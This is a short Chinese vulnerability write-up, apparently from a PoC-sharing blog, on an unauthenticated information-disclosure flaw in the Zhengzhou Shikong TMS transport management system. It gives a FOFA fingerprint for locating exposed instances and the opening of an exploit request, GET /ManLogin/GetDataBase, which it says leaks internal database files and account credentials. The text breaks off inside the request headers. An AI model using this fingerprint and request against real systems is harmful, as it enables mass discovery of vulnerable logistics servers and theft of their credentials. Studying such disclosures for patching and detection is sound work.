郑州时空-TMS运输管理系统 GetDataBase 信息泄露漏洞复现
0x01 产品简介
郑州时空-TMS运输管理系统是一款专为物流运输企业设计的综合性管理软件,旨在提高运输效率、降低运输成本,并实现供应链的协同运作。系统基于现代计算机技术和物流管理方法,结合了郑州时空公司的专业经验和技术优势,为物流运输企业提供了一套高效、智能的运输管理解决方案。该系统支持多网点、多机构、多功能作业,能够全面满足企业的运输管理需求。适用于各类物流运输企业,包括运输公司、各企业下面的运输队等,特别适用于需要高效管理运输过程、降低运输成本并提升供应链效率的企业。
0x02 漏洞概述
郑州时空-TMS运输管理系统 GetDataBase 接口存在信息泄露漏洞,未经身份验证攻击者可通过该漏洞读取系统内部数据库文件,泄露账号密码等重要凭证,导致网站处于极度不安全状态。
0x03 复现环境
FOFA:
body="/Images/ManLogin/name.png"
0x04 漏洞复现
PoC
GET /ManLogin/GetDataBase HTTP/1.1
Host:
User-